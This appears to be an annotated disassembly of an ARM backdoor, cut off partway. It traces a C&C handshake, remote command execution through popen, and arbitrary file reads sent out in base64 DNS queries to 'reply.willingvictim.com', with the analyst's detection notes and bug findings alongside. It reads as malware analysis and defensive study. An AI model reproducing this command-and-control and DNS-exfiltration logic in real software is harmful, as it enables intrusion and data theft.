.text:00011434                 SUB     SP, SP, #8              ; locals: decoded, decoded_len
.text:00011438                 LDR     R1, [R3,#(dword_21E78 - 0x21E54)] ; "check.willingvictim.com"
.text:0001143C                 BL      send_packet_to_C_C      ; send message to C&C server; result ignored
.text:00011440                 MOV     R0, R4                  ; R0 = answer text
.text:00011444                 ADD     R2, SP, #0x10+var_C     ; R2 = &decoded_len
.text:00011448                 MOV     R1, SP                  ; R1 = &decoded
.text:0001144C                 BL      base64_decode           ; decode answer (asserts -> abort on length mismatch)
.text:00011450                 LDR     R3, [SP,#0x10+var_C]
.text:00011454                 CMP     R3, #0                  ; nothing decoded -> error
.text:00011458                 BEQ     error
.text:0001145C                 LDR     R0, [SP,#0x10+var_10]
.text:00011460                 BL      getCommandID            ; classify the decoded text
.text:00011464                 CMP     R0, #1                  ; 1 = "HELLO:" (per header above)
.text:00011468                 BNE     unknown_command
.text:0001146C
.text:0001146C return                                  ; CODE XREF: init_session_with_C2_server+58j
.text:0001146C                                         ; init_session_with_C2_server+60j
.text:0001146C                 ADD     SP, SP, #8              ; decoded buffer is not freed
.text:00011470                 LDMFD   SP!, {R4,PC}
.text:00011474 ; ---------------------------------------------------------------------------
.text:00011474
.text:00011474 unknown_command                         ; CODE XREF: init_session_with_C2_server+40j
.text:00011474                 LDR     R0, =aControlServerP    ; "\nControl server protocol mistmatch."
.text:00011478                 BL      printf
.text:0001147C                 MOV     R0, #0xFFFFFFFF         ; return -1
.text:00011480                 B       return
.text:00011484 ; ---------------------------------------------------------------------------
.text:00011484
.text:00011484 error                                   ; CODE XREF: init_session_with_C2_server+30j
.text:00011484                 MOV     R0, #0xFFFFFFFF         ; return -1
.text:00011488                 B       return
.text:00011488 ; End of function init_session_with_C2_server
.text:00011488
.text:00011488 ; ---------------------------------------------------------------------------
.text:0001148C off_1148C       DCD aHello              ; DATA XREF: init_session_with_C2_server+8r
.text:0001148C                                         ; "HELLO:"
.text:00011490 ; char *off_11490
.text:00011490 off_11490       DCD aControlServerP     ; DATA XREF: init_session_with_C2_server:unknown_commandr
.text:00011490                                         ; "\nControl server protocol mistmatch."
.text:00011494 ; https://www.openssl.org/docs/manmaster/crypto/
.text:00011494
.text:00011494 ; =============== S U B R O U T I N E =======================================
.text:00011494
.text:00011494 ; int base64_encode(const char *buf, size_t len, char **out)   -- analyst reconstruction
.text:00011494 ; Encodes buf[0..len) through a base64 filter BIO into a memory BIO, then
.text:00011494 ; copies the result into a fresh malloc'd, NUL-terminated string at *out.
.text:00011494 ; In:    R0 = buf, R1 = len, R2 = char **out
.text:00011494 ; Out:   R0 = 0 (always); *out written
.text:00011494 ; Stack: 8 bytes; var_1C holds the BUF_MEM * returned by BIO_get_mem_ptr
.text:00011494 ; NOTE(review): BIO_set_close(BIO_NOCLOSE) followed by BIO_free_all leaves
.text:00011494 ; the internal BUF_MEM unfreed, and malloc is not NULL-checked before memcpy.
.text:00011494
.text:00011494 base64_encode                           ; CODE XREF: sendShortReplyTo_C2_Server+Cp
.text:00011494                                         ; sendLargeReplyTo_C2_server+64p
.text:00011494
.text:00011494 var_1C          = -0x1C                 ; BUF_MEM *bptr
.text:00011494
.text:00011494                 STMFD   SP!, {R4-R8,LR}
.text:00011498                 SUB     SP, SP, #8
.text:0001149C                 MOV     R8, R2                  ; R8 = out
.text:000114A0                 MOV     R6, R1                  ; R6 = len
.text:000114A4                 MOV     R5, R0                  ; R5 = buf
.text:000114A8                 BL      BIO_f_base64            ; get the BIO_f_base64 method
.text:000114AC                 BL      BIO_new                 ; b64 = BIO_new(BIO_f_base64())
.text:000114B0                 MOV     R4, R0
.text:000114B4                 BL      BIO_s_mem               ; get the memory BIO method
.text:000114B8                 BL      BIO_new                 ; mem = BIO_new(BIO_s_mem())
.text:000114BC                 MOV     R1, R0
.text:000114C0                 MOV     R0, R4
.text:000114C4                 BL      BIO_push                ; chain: b64 -> mem
.text:000114C8                 MOV     R4, R0                  ; R4 = head of the chain
.text:000114CC                 MOV     R1, #0x100              ; BIO_FLAGS_BASE64_NO_NL: emit one line, no '\n'
.text:000114D0                 BL      BIO_set_flags
.text:000114D4                 MOV     R2, R6
.text:000114D8                 MOV     R1, R5
.text:000114DC                 MOV     R0, R4
.text:000114E0                 BL      BIO_write               ; BIO_write(b64, buf, len)
.text:000114E4                 MOV     R3, #0
.text:000114E8                 MOV     R0, R4
.text:000114EC                 MOV     R2, R3
.text:000114F0                 MOV     R1, #0xB                ; BIO_CTRL_FLUSH (11) -> BIO_flush(b64)
.text:000114F4                 BL      BIO_ctrl
.text:000114F8                 ADD     R3, SP, #0x20+var_1C    ; R3 = &bptr
.text:000114FC                 MOV     R0, R4
.text:00011500                 MOV     R2, #0
.text:00011504                 MOV     R1, #0x73               ; BIO_C_GET_BUF_MEM_PTR (115) -> BIO_get_mem_ptr(b64, &bptr)
.text:00011508                 BL      BIO_ctrl
.text:0001150C                 MOV     R3, #0
.text:00011510                 MOV     R1, #9                  ; BIO_CTRL_SET_CLOSE (9), arg 0 -> BIO_set_close(b64, BIO_NOCLOSE)
.text:00011514                 MOV     R2, R3
.text:00011518                 MOV     R0, R4
.text:0001151C                 BL      BIO_ctrl
.text:00011520                 LDR     R5, [SP,#0x20+var_1C]   ; R5 = bptr
.text:00011524                 MOV     R6, #0
.text:00011528                 LDR     R7, [R5]                ; R7 = bptr->length
.text:0001152C                 ADD     R0, R7, #1              ; size = length + 1
.text:00011530                 BL      malloc                  ; result not checked
.text:00011534                 STR     R0, [R8]                ; *out = str
.text:00011538                 MOV     R2, R7                  ; n = length
.text:0001153C                 LDR     R1, [R5,#4]             ; src = bptr->data
.text:00011540                 BL      memcpy
.text:00011544                 MOV     R3, R0
.text:00011548                 LDR     R2, [R5]
.text:0001154C                 MOV     R0, R4
.text:00011550                 STRB    R6, [R3,R2]             ; str[length] = 0
.text:00011554                 BL      BIO_free_all            ; BUF_MEM survives because of BIO_NOCLOSE (leak)
.text:00011558                 MOV     R0, R6                  ; return 0
.text:0001155C                 ADD     SP, SP, #8
.text:00011560                 LDMFD   SP!, {R4-R8,PC}
.text:00011560 ; End of function base64_encode
.text:00011560
.text:00011564
.text:00011564
.text:00011564 ;*************************************************************
.text:00011564 ;* sendShortReplyTo_C2_Server                                *
.text:00011564 ;*************************************************************
.text:00011564 ;* DESCRIPTION : send a reply to the C&C Server, with a DNS  *
.text:00011564 ;*               request to solve 'reply.willingvictim.com'. *
.text:00011564 ;*                                                           *
.text:00011564 ;* INPUT :                                                   *
.text:00011564 ;*     R0 = string to send                                   *
.text:00011564 ;*     R1 = size of the string                               *
.text:00011564 ;*                                                           *
.text:00011564 ;* OUTPUT :                                                  *
.text:00011564 ;*                                                           *
.text:00011564 ;* RETURN :                                                  *
.text:00011564 ;*************************************************************
.text:00011564 ; Reviewer notes: the base64 string produced into [SP,#var_C] is never
.text:00011564 ; freed, and R0 on return is whatever buildAndSendDNSPacket left in it.
.text:00011564 ; Detection: exfil leaves as DNS queries for "reply.willingvictim.com"
.text:00011564 ; sent towards 172.16.240.129 with a base64 payload in the query.
.text:00011564
.text:00011564
.text:00011564 ; =============== S U B R O U T I N E =======================================
.text:00011564
.text:00011564
.text:00011564 sendShortReplyTo_C2_Server              ; CODE XREF: EXEC_command+40p
.text:00011564                                         ; EXEC_command+90p ...
.text:00011564
.text:00011564 var_C           = -0xC                  ; char *encoded (set by base64_encode)
.text:00011564 var_4           = -4                    ; saved LR
.text:00011564
.text:00011564                 STR     LR, [SP,#var_4]!        ; push LR (leaf-style frame, no other saves)
.text:00011568                 SUB     SP, SP, #0xC
.text:0001156C                 ADD     R2, SP, #0x10+var_C     ; R2 = &encoded
.text:00011570                 BL      base64_encode           ; base64_encode(R0 str, R1 len, &encoded)
.text:00011574                 LDR     R3, =aHello             ; R3 = &aHello, base for the .data pointer table
.text:00011578                 LDR     R0, [SP,#0x10+var_C]    ; R0 = encoded
.text:0001157C                 LDR     R2, [R3,#(dword_21E7C - 0x21E54)] ; 'reply.willingvictim.com'
.text:00011580                 LDR     R1, [R3,#(dword_21E74 - 0x21E54)] ; '172.16.240.129'
.text:00011584                 BL      buildAndSendDNSPacket   ; buildAndSendDNSPacket ( encoded, "172.16.240.129", "reply.willingvictim.com" );
.text:00011588                 ADD     SP, SP, #0xC            ; encoded is not freed
.text:0001158C                 LDR     PC, [SP+4+var_4],#4     ; pop LR straight into PC
.text:0001158C ; End of function sendShortReplyTo_C2_Server
.text:0001158C
.text:0001158C ; ---------------------------------------------------------------------------
.text:00011590 off_11590       DCD aHello              ; DATA XREF: sendShortReplyTo_C2_Server+10r
.text:00011590                                         ; "HELLO:"
.text:00011594
.text:00011594
.text:00011594 ;*************************************************************
.text:00011594 ;* sendLargeReplyTo_C2_Server                                *
.text:00011594 ;*************************************************************
.text:00011594 ;* DESCRIPTION : send a reply to the C&C Server, with a DNS  *
.text:00011594 ;*               request to solve 'reply.willingvictim.com'.
* .text:00011594 ;*                                                           *
.text:00011594 ;* INPUT :                                                   *
.text:00011594 ;*     R0 = string to send                                   *
.text:00011594 ;*     R1 = size of the string                               *
.text:00011594 ;*                                                           *
.text:00011594 ;* OUTPUT :                                                  *
.text:00011594 ;*                                                           *
.text:00011594 ;* RETURN :                                                  *
.text:00011594 ;*************************************************************
.text:00011594 ; Full argument list as actually used by the code below:
.text:00011594 ;   R0 = data, R1 = len, R2 = chunk size (caller passes 0xB8),
.text:00011594 ;   R3 = prefix string ("EXEC:" / "FILE:" from the callers).
.text:00011594 ; Builds prefix||data, NUL-terminates it, base64-encodes it and sends it
.text:00011594 ; as one DNS query.  Tail-calls free() on the assembled buffer, so the
.text:00011594 ; caller sees free's return value in R0.
.text:00011594 ; NOTE(review): the buffer is malloc(R2 + strlen(prefix)) but the NUL is
.text:00011594 ; written at index strlen(prefix) + len; when len == R2 (a full 184-byte
.text:00011594 ; chunk) that is one byte past the allocation.  The base64 string from
.text:00011594 ; base64_encode ([SP,#var_1C]) is never freed.  malloc is not NULL-checked.
.text:00011594
.text:00011594
.text:00011594 ; =============== S U B R O U T I N E =======================================
.text:00011594
.text:00011594
.text:00011594 sendLargeReplyTo_C2_server              ; CODE XREF: sendLargeBufferTo_C2_server+74p
.text:00011594
.text:00011594 var_1C          = -0x1C                 ; char *encoded (set by base64_encode)
.text:00011594
.text:00011594                 STMFD   SP!, {R4-R8,LR}
.text:00011598                 MOV     R8, R0                  ; R8 = data
.text:0001159C                 SUB     SP, SP, #8
.text:000115A0                 MOV     R0, R3                  ; s = prefix
.text:000115A4                 MOV     R7, R3                  ; R7 = prefix
.text:000115A8                 MOV     R6, R1                  ; R6 = len
.text:000115AC                 MOV     R5, R2                  ; R5 = chunk size
.text:000115B0                 BL      strlen
.text:000115B4                 MOV     R4, R0                  ; R4 = prefixLen
.text:000115B8                 ADD     R0, R5, R0              ; size = chunk size + prefixLen (no +1 for the NUL)
.text:000115BC                 BL      malloc                  ; result not checked
.text:000115C0                 MOV     R5, R0                  ; R5 = msg
.text:000115C4                 MOV     R2, R4                  ; n = prefixLen
.text:000115C8                 MOV     R1, R7                  ; src = prefix
.text:000115CC                 BL      memcpy                  ; msg[0..prefixLen) = prefix
.text:000115D0                 MOV     R2, R6                  ; n = len
.text:000115D4                 MOV     R1, R8                  ; src = data
.text:000115D8                 ADD     R0, R5, R4              ; dest = msg + prefixLen
.text:000115DC                 BL      memcpy                  ; msg[prefixLen..prefixLen+len) = data
.text:000115E0                 MOV     R3, #0
.text:000115E4                 ADD     R4, R4, R6              ; R4 = total = prefixLen + len
.text:000115E8                 MOV     R1, R4
.text:000115EC                 ADD     R2, SP, #0x20+var_1C    ; R2 = &encoded
.text:000115F0                 STRB    R3, [R5,R4]             ; msg[total] = 0  (off by one when len == chunk size)
.text:000115F4                 MOV     R0, R5
.text:000115F8                 BL      base64_encode           ; base64_encode(msg, total, &encoded)
.text:000115FC                 LDR     R3, =aHello             ; R3 = &aHello, base for the .data pointer table
.text:00011600                 LDR     R0, [SP,#0x20+var_1C]   ; R0 = encoded
.text:00011604                 LDR     R2, [R3,#(dword_21E7C - 0x21E54)] ; reply.willingvictim.com
.text:00011608                 LDR     R1, [R3,#(dword_21E74 - 0x21E54)] ; 172.16.240.129
.text:0001160C                 BL      buildAndSendDNSPacket   ; send encoded as a DNS query
.text:00011610                 MOV     R0, R5                  ; ptr = msg
.text:00011614                 ADD     SP, SP, #8              ; encoded is not freed
.text:00011618                 LDMFD   SP!, {R4-R8,LR}
.text:0001161C                 B       free                    ; tail call: free(msg) and return to our caller
.text:0001161C ; End of function sendLargeReplyTo_C2_server
.text:0001161C
.text:0001161C ; ---------------------------------------------------------------------------
.text:00011620 off_11620       DCD aHello              ; DATA XREF:
sendLargeReplyTo_C2_server+68r
.text:00011620                                         ; "HELLO:"
.text:00011624 ;*************************************************************
.text:00011624 ;* sendLargeBufferTo_C2_server                               *
.text:00011624 ;*************************************************************
.text:00011624 ;* DESCRIPTION : send a large buffer to C&C server, cutting  *
.text:00011624 ;*               it into short DNS requests.                 *
.text:00011624 ;*                                                           *
.text:00011624 ;* INPUT :                                                   *
.text:00011624 ;*     R0 = buffer to send                                   *
.text:00011624 ;*     R1 = size of buffer                                   *
.text:00011624 ;*     R2 = prefix string passed to every chunk              *
.text:00011624 ;*                                                           *
.text:00011624 ;* OUTPUT:                                                   *
.text:00011624 ;*                                                           *
.text:00011624 ;* RETURN:                                                   *
.text:00011624 ;*************************************************************
.text:00011624 ; Chunking: size is divided by 0xB8 (184) with a signed magic-number
.text:00011624 ; multiply (0xB21642C9 = ceil(2^39 / 184)), rounded up when there is a
.text:00011624 ; remainder, and forced to 1 chunk when the quotient is 0.  Each chunk
.text:00011624 ; goes through sendLargeReplyTo_C2_server(ptr, min(remaining,184), 184,
.text:00011624 ; prefix), followed by sleep(dword_21EF8) when that global is non-zero.
.text:00011624 ; Detection: a burst of DNS queries for reply.willingvictim.com, each
.text:00011624 ; carrying base64 of at most prefix + 184 bytes, spaced by that delay.
.text:00011624
.text:00011624 ; =============== S U B R O U T I N E =======================================
.text:00011624
.text:00011624
.text:00011624 sendLargeBufferTo_C2_server             ; CODE XREF: EXEC_command+5Cp
.text:00011624                                         ; FILE_command+120p
.text:00011624                 LDR     R3, =0xB21642C9         ; reciprocal of 184 (see header)
.text:00011628                 STMFD   SP!, {R4-R10,LR}
.text:0001162C                 SMULL   R12, R3, R3, R1         ; R3 = hi32(size * magic) (signed)
.text:00011630                 MOV     R6, R1,ASR#31           ; R6 = sign(size)
.text:00011634                 ADD     R3, R3, R1              ; magic is "negative" as int32: add size back
.text:00011638                 RSBS    R6, R6, R3,ASR#7        ; R6 = size / 184 (truncating)
.text:0001163C                 BEQ     loc_116C4               ; quotient 0 -> still send one chunk
.text:00011640                 MOV     R3, #0xB8
.text:00011644                 MUL     R3, R3, R6              ; R3 = chunks * 184
.text:00011648                 CMP     R1, R3
.text:0001164C                 ADDNE   R6, R6, #1              ; remainder -> one more chunk
.text:00011650                 CMP     R6, #0
.text:00011654                 BLE     another_return          ; negative size -> nothing to do
.text:00011658
.text:00011658 loc_11658                               ; CODE XREF: sendLargeBufferTo_C2_server+A4j
.text:00011658                 MOV     R7, R2                  ; R7 = prefix
.text:0001165C                 MOV     R4, R1                  ; R4 = bytes remaining
.text:00011660                 MOV     R5, R0                  ; R5 = current chunk pointer
.text:00011664                 MOV     R8, #0                  ; R8 = chunks sent
.text:00011668                 LDR     R9, =dword_21EF8        ; R9 = &inter-chunk delay (seconds)
.text:0001166C                 B       next_part_please
.text:00011670 ; ---------------------------------------------------------------------------
.text:00011670
.text:00011670 loc_11670                               ; CODE XREF: sendLargeBufferTo_C2_server+84j
.text:00011670                 CMP     R6, R8                  ; all chunks sent ?
.text:00011674                 SUB     R4, R4, #0xB8           ; remaining -= 184 (may go "negative"; min() below uses unsigned compare)
.text:00011678                 ADD     R5, R5, #0xB8           ; ptr += 184
.text:0001167C                 BLE     return
.text:00011680
.text:00011680 next_part_please                        ; CODE XREF: sendLargeBufferTo_C2_server+48j
.text:00011680                                         ; sendLargeBufferTo_C2_server+98j
.text:00011680                 CMP     R4, #0xB8
.text:00011684                 MOVCC   R1, R4                  ; len = remaining  (if < 184, unsigned)
.text:00011688                 MOVCS   R1, #0xB8               ; len = 184        (otherwise)
.text:0001168C                 MOV     R0, R5                  ; data = ptr
.text:00011690                 MOV     R3, R7                  ; prefix
.text:00011694                 MOV     R2, #0xB8               ; chunk size = 184
.text:00011698                 BL      sendLargeReplyTo_C2_server
.text:0001169C                 LDR     R0, [R9]                ; delay between chunks (original note: 4 seconds; value lives in dword_21EF8)
.text:000116A0                 ADD     R8, R8, #1              ; chunks sent++
.text:000116A4                 CMP     R0, #0
.text:000116A8                 BEQ     loc_11670               ; no delay configured
.text:000116AC                 BL      sleep                   ; sleep(delay)
.text:000116B0                 CMP     R6, R8                  ; same advance as loc_11670, duplicated after the sleep
.text:000116B4                 SUB     R4, R4, #0xB8           ; 184
.text:000116B8                 ADD     R5, R5, #0xB8
.text:000116BC                 BGT     next_part_please
.text:000116C0
.text:000116C0 return                                  ; CODE XREF: sendLargeBufferTo_C2_server+58j
.text:000116C0                 LDMFD   SP!, {R4-R10,PC}        ; R0 is whatever the last call left (no defined return)
.text:000116C4 ; ---------------------------------------------------------------------------
.text:000116C4
.text:000116C4 loc_116C4                               ; CODE XREF: sendLargeBufferTo_C2_server+18j
.text:000116C4                 MOV     R6, #1                  ; size < 184 (incl. 0): exactly one chunk
.text:000116C8                 B       loc_11658
.text:000116CC ; ---------------------------------------------------------------------------
.text:000116CC
.text:000116CC another_return                          ; CODE XREF: sendLargeBufferTo_C2_server+30j
.text:000116CC                 LDMFD   SP!, {R4-R10,PC}
.text:000116CC ; End of function sendLargeBufferTo_C2_server
.text:000116CC
.text:000116CC ; ---------------------------------------------------------------------------
.text:000116D0 dword_116D0     DCD 0xB21642C9          ; DATA XREF: sendLargeBufferTo_C2_serverr
.text:000116D4 off_116D4       DCD dword_21EF8         ; DATA XREF: sendLargeBufferTo_C2_server+44r
.text:000116D8
.text:000116D8 ; =============== S U B R O U T I N E =======================================
.text:000116D8
.text:000116D8 ; int EXEC_command(const char *cmd, char *linebuf)   -- analyst reconstruction
.text:000116D8 ; Remote command execution: the text after "EXEC:" in the decoded C2
.text:000116D8 ; answer is handed to popen(..., "r"); every output line is read into
.text:000116D8 ; linebuf (0x7FF max, caller allocates 0x800) and sent back with the
.text:000116D8 ; "EXEC:" prefix, framed by EXEC:START_STATE / EXEC:STOP_STATE replies.
.text:000116D8 ; In:    R0 = decoded command text, R1 = line buffer
.text:000116D8 ; Out:   R0 = 1 on completion, -1 if popen failed
.text:000116D8 ; NOTE(review): the strstr result at +C is not NULL-checked before the
.text:000116D8 ; pointer arithmetic feeding popen.  IDA's label names are misleading:
.text:000116D8 ; execCmdLine sends one output line, getCommandToExec reads the next one.
.text:000116D8 ; Detection: shell children of this process; DNS queries carrying the
.text:000116D8 ; START/STOP markers and command output in base64.
.text:000116D8
.text:000116D8 EXEC_command                            ; CODE XREF: InterpretAndExecuteCommand+DCp
.text:000116D8                 STMFD   SP!, {R4-R6,LR}
.text:000116DC                 MOV     R4, R1                  ; R4 = linebuf
.text:000116E0                 LDR     R1, =aExec              ; "EXEC:"
.text:000116E4                 BL      strstr                  ; R0 = position of "EXEC:" in cmd (NULL not handled)
.text:000116E8                 MOV     R5, R0
.text:000116EC                 LDR     R0, =aExec              ; "EXEC:"
.text:000116F0                 BL      strlen
.text:000116F4                 LDR     R1, =aR                 ; "r"
.text:000116F8                 ADD     R0, R5, R0              ; command = text after "EXEC:"
.text:000116FC                 BL      popen                   ; ================> Execute asked cmdline (server-supplied)
.text:00011700                 SUBS    R5, R0, #0              ; R5 = stream
.text:00011704                 BEQ     loc_11774               ; popen failed -> -1
.text:00011708                 LDR     R0, =aExecStart_stat    ; "EXEC:START_STATE"
.text:0001170C                 BL      strlen
.text:00011710                 MOV     R1, R0
.text:00011714                 LDR     R0, =aExecStart_stat    ; "EXEC:START_STATE"
.text:00011718                 BL      sendShortReplyTo_C2_Server
.text:0001171C                 B       getCommandToExec
.text:00011720 ; ---------------------------------------------------------------------------
.text:00011720
.text:00011720 execCmdLine                             ; CODE XREF: EXEC_command+74j
.text:00011720                 MOV     R0, R4                  ; s = linebuf (one line of command output)
.text:00011724                 BL      strlen
.text:00011728                 LDR     R2, =aExec              ; "EXEC:"
.text:0001172C                 MOV     R1, R0
.text:00011730                 MOV     R0, R4
.text:00011734                 BL      sendLargeBufferTo_C2_server ; exfiltrate the line in 184-byte chunks
.text:00011738
.text:00011738 getCommandToExec                        ; CODE XREF: EXEC_command+44j
.text:00011738                 MOV     R2, R5                  ; stream
.text:0001173C                 LDR     R1, =0x7FF              ; n (caller's buffer is 0x800)
.text:00011740                 MOV     R0, R4                  ; s
.text:00011744                 BL      fgets                   ; next line of output
.text:00011748                 CMP     R0, #0
.text:0001174C                 BNE     execCmdLine             ; got a line -> send it
.text:00011750                 MOV     R0, R5                  ; stream
.text:00011754                 BL      pclose
.text:00011758                 LDR     R0, =aExecStop_state    ; "EXEC:STOP_STATE"
.text:0001175C                 BL      strlen
.text:00011760                 MOV     R1, R0
.text:00011764                 LDR     R0, =aExecStop_state    ; "EXEC:STOP_STATE"
.text:00011768                 BL      sendShortReplyTo_C2_Server
.text:0001176C                 MOV     R0, #1                  ; return 1
.text:00011770                 LDMFD   SP!, {R4-R6,PC}
.text:00011774 ; ---------------------------------------------------------------------------
.text:00011774
.text:00011774 loc_11774                               ; CODE XREF: EXEC_command+2Cj
.text:00011774                 MOV     R0, #0xFFFFFFFF         ; return -1
.text:00011778                 LDMFD   SP!, {R4-R6,PC}
.text:00011778 ; End of function EXEC_command
.text:00011778
.text:00011778 ; ---------------------------------------------------------------------------
.text:0001177C ; char *s
.text:0001177C s               DCD aExec               ; DATA XREF: EXEC_command+8r
.text:0001177C                                         ; EXEC_command+14r ...
.text:0001177C                                         ; "EXEC:"
.text:00011780 ; char *modes
.text:00011780 modes           DCD aR                  ; DATA XREF: EXEC_command+1Cr
.text:00011780                                         ; "r"
.text:00011784 ; char *off_11784
.text:00011784 off_11784       DCD aExecStart_stat     ; DATA XREF: EXEC_command+30r
.text:00011784                                         ; EXEC_command+3Cr
.text:00011784                                         ; "EXEC:START_STATE"
.text:00011788 ; int n
.text:00011788 n               DCD 0x7FF               ; DATA XREF: EXEC_command+64r
.text:0001178C ; char *off_1178C
.text:0001178C off_1178C       DCD aExecStop_state     ; DATA XREF: EXEC_command+80r
.text:0001178C                                         ; EXEC_command+8Cr
.text:0001178C                                         ; "EXEC:STOP_STATE"
.text:00011790
.text:00011790 ; =============== S U B R O U T I N E =======================================
.text:00011790
.text:00011790 ; int FILE_command(const char *cmd)   -- analyst reconstruction
.text:00011790 ; File exfiltration: the text after "FILE:" (last character stripped) is
.text:00011790 ; opened with fopen(..., "r"), sized via fseek/ftell, read whole into a
.text:00011790 ; malloc'd buffer and sent with the "FILE:" prefix, framed by
.text:00011790 ; "FILE:START_STATE,NAME=<name>" and "FILE:STOP_STATE" replies.
.text:00011790 ; In:    R0 = decoded command text
.text:00011790 ; Out:   R0 = 1 on completion, -1 on fopen/ftell/fseek(SEEK_SET) failure
.text:00011790 ; Register roles: R4 = filename, R5 = FILE*, R6 = scratch/0 then
.text:00011790 ;                 header string, R7 = file buffer, R8 = file size
.text:00011790 ; NOTE(review), all grounded in the code below:
.text:00011790 ;  - strstr result (+8) and both malloc results are not NULL-checked;
.text:00011790 ;  - if the first fseek fails (+54) control jumps to loc_11844 with R7 and
.text:00011790 ;    R8 still holding the caller's register values, and they are then
.text:00011790 ;    passed to sendLargeBufferTo_C2_server and free();
.text:00011790 ;  - the ftell / second-fseek error exits (+68, +8C) return without
.text:00011790 ;    fclose (and without freeing R7 on the second one);
.text:00011790 ;  - the terminator after fread is stored at buf[n+1] instead of buf[n]
.text:00011790 ;    (+A8..+AC): one byte past malloc(size+1) when the read is complete;
.text:00011790 ;  - the second snprintf (+104) uses the server-supplied filename as the
.text:00011790 ;    FORMAT argument, a classic format-string defect.
.text:00011790 ; Detection: reads of arbitrary files by this process followed by bursts
.text:00011790 ; of reply.willingvictim.com queries carrying the file in base64.
.text:00011790
.text:00011790 FILE_command                            ; CODE XREF: InterpretAndExecuteCommand+9Cp
.text:00011790                 STMFD   SP!, {R4-R8,LR}
.text:00011794                 LDR     R1, =aFile              ; "FILE:"
.text:00011798                 BL      strstr                  ; position of "FILE:" in cmd (NULL not handled)
.text:0001179C                 MOV     R4, R0
.text:000117A0                 LDR     R0, =aFile              ; "FILE:"
.text:000117A4                 BL      strlen
.text:000117A8                 ADD     R4, R4, R0              ; R4 = filename = text after "FILE:"
.text:000117AC                 MOV     R0, R4                  ; s
.text:000117B0                 BL      strlen
.text:000117B4
.text:000117B4 ; Get the file size
.text:000117B4                 MOV     R6, #0
.text:000117B8                 ADD     R0, R4, R0
.text:000117BC                 STRB    R6, [R0,#-1]            ; drop the last char of the name (presumably a trailing '\n'; writes before the name if it is empty)
.text:000117C0                 LDR     R1, =aR                 ; "r"
.text:000117C4                 MOV     R0, R4                  ; filename
.text:000117C8                 BL      fopen
.text:000117CC                 SUBS    R5, R0, #0              ; R5 = FILE*
.text:000117D0                 BEQ     loc_118FC               ; fopen failed -> -1
.text:000117D4                 MOV     R1, R6                  ; off = 0
.text:000117D8                 MOV     R2, #2                  ; whence = SEEK_END
.text:000117DC                 BL      fseek
.text:000117E0                 SUBS    R6, R0, #0
.text:000117E4                 BNE     loc_11844               ; fseek failed: jumps ahead with R7/R8 uninitialised (see note)
.text:000117E8                 MOV     R0, R5                  ; stream
.text:000117EC                 BL      ftell
.text:000117F0
.text:000117F0 ; Allocate a buffer to read file content
.text:000117F0                 CMN     R0, #1                  ; ftell == -1 ?
.text:000117F4                 MOV     R8, R0                  ; R8 = file size
.text:000117F8                 BEQ     loc_118FC               ; error -> -1 (FILE* leaked)
.text:000117FC                 ADD     R0, R0, #1              ; size = file size + 1
.text:00011800                 BL      malloc                  ; result not checked
.text:00011804                 MOV     R2, R6                  ; whence = 0 (SEEK_SET)
.text:00011808                 MOV     R1, R6                  ; off = 0
.text:0001180C                 MOV     R7, R0                  ; R7 = buf
.text:00011810                 MOV     R0, R5                  ; stream
.text:00011814                 BL      fseek                   ; rewind
.text:00011818                 SUBS    R6, R0, #0
.text:0001181C                 BNE     loc_118FC               ; error -> -1 (FILE* and buf leaked)
.text:00011820
.text:00011820 ; Read file content
.text:00011820                 MOV     R3, R5                  ; stream
.text:00011824                 MOV     R2, R8                  ; n = file size
.text:00011828                 MOV     R1, #1                  ; size
.text:0001182C                 MOV     R0, R7                  ; ptr
.text:00011830                 BL      fread                   ; R0 = bytes read
.text:00011834                 CMP     R0, #0
.text:00011838                 ADDNE   R0, R7, R0              ; R0 = buf + n
.text:0001183C                 STRNEB  R6, [R0,#1]             ; buf[n+1] = 0  -- off by one (should be buf[n]); see note
.text:00011840                 BEQ     loc_118E0               ; nothing read -> report, then continue anyway
.text:00011844
.text:00011844 loc_11844                               ; CODE XREF: FILE_command+54j
.text:00011844                                         ; FILE_command+168j
.text:00011844                 MOV     R0, R5                  ; stream
.text:00011848                 BL      fclose
.text:0001184C                 MOV     R0, R4                  ; s = filename
.text:00011850                 BL      strlen
.text:00011854                 MOV     R5, R0                  ; R5 = strlen(filename)
.text:00011858                 LDR     R0, =aFileStart_stat    ; "FILE:START_STATE,NAME="
.text:0001185C                 BL      strlen
.text:00011860                 ADD     R5, R5, R0              ; R5 = header length
.text:00011864                 ADD     R0, R5, #1              ; size = header length + 1
.text:00011868                 BL      malloc                  ; result not checked
.text:0001186C                 MOV     R1, R5                  ; maxlen
.text:00011870                 LDR     R2, =aFileStart_stat    ; "FILE:START_STATE,NAME="
.text:00011874                 MOV     R6, R0                  ; R6 = header
.text:00011878                 BL      snprintf                ; snprintf(header, len, "FILE:START_STATE,NAME=")
.text:0001187C                 LDR     R0, =aFileStart_stat    ; "FILE:START_STATE,NAME="
.text:00011880                 BL      strlen
.text:00011884                 RSB     R1, R0, R5
.text:00011888                 MOV     R2, R4                  ; format = filename  <-- server-controlled format string
.text:0001188C                 ADD     R1, R1, #1              ; maxlen = remaining + 1
.text:00011890                 ADD     R0, R6, R0              ; s = header + prefix length
.text:00011894                 BL      snprintf
.text:00011898                 MOV     R1, R5
.text:0001189C                 MOV     R0, R6
.text:000118A0                 BL      sendShortReplyTo_C2_Server ; announce the file name
.text:000118A4                 LDR     R2, =aFile              ; "FILE:"
.text:000118A8                 MOV     R1, R8                  ; file size (uninitialised on the fseek-failure path)
.text:000118AC                 MOV     R0, R7                  ; buf   (idem)
.text:000118B0                 BL      sendLargeBufferTo_C2_server ; exfiltrate the content in 184-byte chunks
.text:000118B4                 LDR     R0, =aFileStop_state    ; "FILE:STOP_STATE"
.text:000118B8                 BL      strlen
.text:000118BC                 MOV     R1, R0
.text:000118C0                 LDR     R0, =aFileStop_state    ; "FILE:STOP_STATE"
.text:000118C4                 BL      sendShortReplyTo_C2_Server
.text:000118C8                 MOV     R0, R7                  ; ptr = buf
.text:000118CC                 BL      free
.text:000118D0                 MOV     R0, R6                  ; ptr = header
.text:000118D4                 BL      free
.text:000118D8                 MOV     R0, #1                  ; return 1
.text:000118DC                 LDMFD   SP!, {R4-R8,PC}
.text:000118E0 ; ---------------------------------------------------------------------------
.text:000118E0
.text:000118E0 loc_118E0                               ; CODE XREF: FILE_command+B0j
.text:000118E0                 LDR     R3, =__bss_start
.text:000118E4                 MOV     R2, #0x12               ; n = 18 = strlen("Error reading file")
.text:000118E8                 LDR     R3, [R3]                ; s = FILE* stored at __bss_start (presumably stderr -- confirm)
